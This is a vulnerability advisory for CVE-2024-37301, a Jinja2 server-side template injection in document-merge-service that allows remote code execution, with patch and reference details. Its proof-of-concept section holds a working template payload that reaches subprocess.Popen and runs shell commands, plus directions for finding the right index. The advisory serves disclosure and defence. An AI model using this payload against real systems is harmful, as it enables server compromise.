CVE-2024-37301

Description

### Impact _What kind of vulnerability is it? Who is impacted?_ A remote code execution (RCE) via server-side template injection (SSTI) allows for user supplied code to be executed in the server's context where it is executed as the document-merge-server user with the UID 901 thus giving an attacker considerable control over the container. ### Patches _Has the problem been patched? What versions should users upgrade to?_ It has been patched in v6.5.2 ### References _Are there any links users can visit to find out more?_ - https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti ### POC Add the following to a document, upload and render it: ```jinja2 {% if PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202] %} ls -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("ls -a", shell=True, stdout=-1).communicate()[0].strip() }} whoami: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("whoami", shell=True, stdout=-1).communicate()[0].strip() }} uname -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("uname -a", shell=True, stdout=-1).communicate()[0].strip() }} {% endif %} ``` The index might be different, so to debug this first render a template with `{{ PLACEHOLDER.__class__.__mro__[1].__subclasses__() }}` and then get the index of `subprocess.Popen` and replace 202 with that. 

Affected packages (1)

• PyPI/document-merge-servicefrom 0, < 6.5.2

CVSS scores

References (4)

• ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2024-37301
• PATCHhttps://github.com/adfinis/document-merge-service
• WEBhttps://github.com/adfinis/document-merge-service/commit/a1edd39d33d1bdf75c31ea01c317547be90ca074
• WEBhttps://github.com/adfinis/document-merge-service/security/advisories/GHSA-v5gf-r78h-55q6